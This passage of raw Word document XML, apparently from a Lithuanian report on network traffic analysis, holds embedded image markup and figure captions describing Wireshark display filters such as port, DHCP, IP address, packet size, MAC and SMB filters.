                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="2263775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B67C81" w14:textId="315FD7C8" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">11 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras tcp.port==80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D35348" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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0844FBD3" w14:textId="71D5769B" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253411D8" w14:textId="6BCF78BA" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00394C41" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="115763FF" wp14:editId="380A32E0">
            <wp:extent cx="6299836" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="58" name="Paveikslėlis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58"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1722755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EDA5C" w14:textId="7299480F" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">12 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras DHCP bootp.option.type == 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1BDA21" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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255CFD79" w14:textId="026260C9" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1327BB0A" w14:textId="6D0865BE" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00415E01" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76340EE0" wp14:editId="5B9D18EB">
            <wp:extent cx="6299836" cy="1968500"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="59" name="Paveikslėlis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59"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1968500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D758C6" w14:textId="676FC7AF" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">13 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras Šaltinio IP ip.src==192.168.137.39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21757933" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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2029FC92" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D87DFF" w14:textId="1E975E5D" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="002D7587" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71B5962C" wp14:editId="744AE6C6">
            <wp:extent cx="6299836" cy="1704340"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="15" name="Paveikslėli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5"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId277">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1704340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04184C2D" w14:textId="1B443F5C" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">14 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras paskirties IP ip.dst==13.107.18.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F147E" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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52B24F85" w14:textId="2D0A3613" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC9449A" w14:textId="613D93BE" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00CC0055" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1259BEE3" wp14:editId="6E99F340">
            <wp:extent cx="6299836" cy="1267460"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8890"/>
            <wp:docPr id="61" name="Paveikslėlis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61"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId278">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1267460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CC82D" w14:textId="1CE08D40" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">15 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras turinys GOOGLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69086FD7" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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2930F646" w14:textId="456EADF3" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4214165F" w14:textId="1D92CDB3" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00C11CAC" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23EA0221" wp14:editId="1270E3AC">
            <wp:extent cx="6299836" cy="1525905"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="62" name="Paveikslėlis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62"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId279">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1525905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE8327" w14:textId="5271868C" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">16 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras mažesni nei 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EA6315" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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4D00C5D6" w14:textId="2977065D" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563BF35A" w14:textId="4E66AD34" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="001653A3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="540F92DC" wp14:editId="0C14F8DD">
            <wp:extent cx="6299836" cy="1439545"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
            <wp:docPr id="63" name="Paveikslėlis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63"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId280">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1439545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="738FE90B" w14:textId="771483BC" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">17 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras didesnis nei 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC3D1C" w14:textId="77777777" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85"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484615C7" w14:textId="5C5ADA5A" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2477993F" w14:textId="1F71224F" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00364D7E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="523DEF6A" wp14:editId="4B4066F8">
            <wp:extent cx="6299836" cy="1534160"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8890"/>
            <wp:docPr id="994336192" name="Paveikslėlis 994336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994336192"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId281">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="1534160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE8EA9" w14:textId="0DF96278" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">18 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras MAC adreso paskirties vieta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E50056" w14:textId="5CF00D52" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Zykas A. (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BF5BC" w14:textId="77777777" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AA4937" w14:textId="657973C3" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00ED3854" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F5AF15A" wp14:editId="281C75D5">
            <wp:extent cx="6299836" cy="560070"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="994336193" name="Paveikslėlis 994336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994336193"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="560070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A21FA" w14:textId="171D8AA0" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>19. Pav. Wireshark. Filtras SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566462B" w14:textId="77777777" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85"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04654AAA" w14:textId="1487C28A" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373EEF64" w14:textId="16A76CDF" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00396E63" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30085A90" wp14:editId="33458008">
            <wp:extent cx="6299836" cy="1186180"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="994336194" name="Paveikslėlis 994336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994336194"/>
